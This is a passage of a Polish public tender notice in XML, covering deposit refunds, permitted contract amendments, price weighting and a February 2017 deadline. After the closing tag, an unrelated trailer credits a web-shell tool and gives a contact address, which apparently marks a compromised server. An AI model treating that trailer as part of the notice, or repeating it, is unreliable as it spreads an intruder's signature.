15.12	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane na rachunek bankowy wskazany przez Wykonawcę. </wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow>N</czy_ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie>N</czy_obejmuje_ustanowienie><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow>N</czy_pobranie_umowy_ramowej_dynamicznego_katalogow><czy_umowy_ramowej_dynamicznego_katalogow>N</czy_umowy_ramowej_dynamicznego_katalogow><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>22.1	Dopuszczalne jest dokonywanie zmian umowy o charakterze nieistotnym, przez co należy rozumieć zmiany nieodnoszące się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które, gdyby były znane w momencie wszczęcia procedury mającej na celu zawarcie umowy nie miałyby wpływu na udział większej liczby podmiotów zainteresowanych tą procedurą. Taki charakter mają np. zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana osób wskazanych do kontaktów między stronami, zmiana osób pełniących funkcje kierownicze w ramach realizacji zamówienia.
22.2	Określając warunki dokonania zmiany umowy, Strony sporządzają Protokół Negocjacji, biorąc pod uwagę w szczególności: 
a)	opis zmiany;
b)	uzasadnienie zmiany; 
c)	koszt zmiany i sposób jego wyliczenia, o ile występuje;
d)	wpływ zmiany na wysokość wynagrodzenia, o ile występuje;
e)	czas wykonania zmiany;
f)	wpływ zmiany na termin zakończenia umowy. 
22.3	Przewiduje się możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia.
22.3.1	Zmiana terminu wykonania umowy w przypadku:
a)	wystąpienia opóźnień w wykonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji lub podmioty trzecie, niezależne od stron umowy, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;
b)	wystąpienia okoliczności związanych z wdrażaniem przedmiotu umowy, niezależnych od stron umowy, których doświadczony Wykonawca nie mógł przewidzieć w chwili składania oferty;
c)	konieczności wprowadzenia modyfikacji przyjętych rozwiązań technicznych obejmujących przedmiot umowy;
d)	zmiany zakresu rzeczowego zamówienia w sytuacjach, o których mowa poniżej w pkt. 22.3.2.
22.3.2	Zmiana zakresu rzeczowego zamówienia jest możliwa w przypadku: 
a) zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu umowy;
b) w innych przypadkach podanych w umowie.
22.3.3	Zmiana dotycząca realizacji dodatkowych dostaw lub usług od dotychczasowego Wykonawcy, nieobjętych zamówieniem podstawowym jest możliwa, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:
a)	zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego;
b)	zmiana  Wykonawcy  spowodowałaby  istotną  niedogodność  lub  znaczne zwiększenie kosztów dla Zamawiającego;
c)	wartość  każdej  kolejnej  zmiany nie  przekracza  50%  wartości  zamówienia określonej pierwotnie w umowie.
22.3.4	Zmiana wysokości wynagrodzenia, jest możliwa w przypadku:
a)	zmiany stawki podatku VAT;
b)	wprowadzenia zmiany dotyczącej realizacji dodatkowych dostaw lub usług, o których mowa powyżej w pkt. 22.3.3. 
22.4	Jeżeli Wykonawca uważa się za uprawnionego do zmiany terminu zakończenia umowy, sposobu i zakresu wykonania przedmiotu umowy, zobowiązany jest do przekazania Zamawiającemu wniosku dotyczącego zmiany umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany.
22.5	Złożenie wniosku, o którym mowa powyżej nie zwalnia Wykonawcy od bieżącego wykonywania umowy.
22.6	Po otrzymaniu wniosku Wykonawcy, Zamawiający w terminie 21 dni roboczych przekazuje Wykonawcy swoje stanowisko, ewentualnie wyznacza termin spotkania negocjacyjnego.</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>Cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci>0</ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>15/02/2017</data_skl><godz_skl>12:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast>N</le_czy_nast><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta>N</le_czy_nasta><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>N</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie>N</IV_3_1_Przewidziane_jest_zastrzezenie><IV_3_1_Przewidziany_podzial>N</IV_3_1_Przewidziany_podzial><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu>N</IV_3_2_PodzialDialogu><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji>N</IV_3_3_PodzialNegocjacji><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com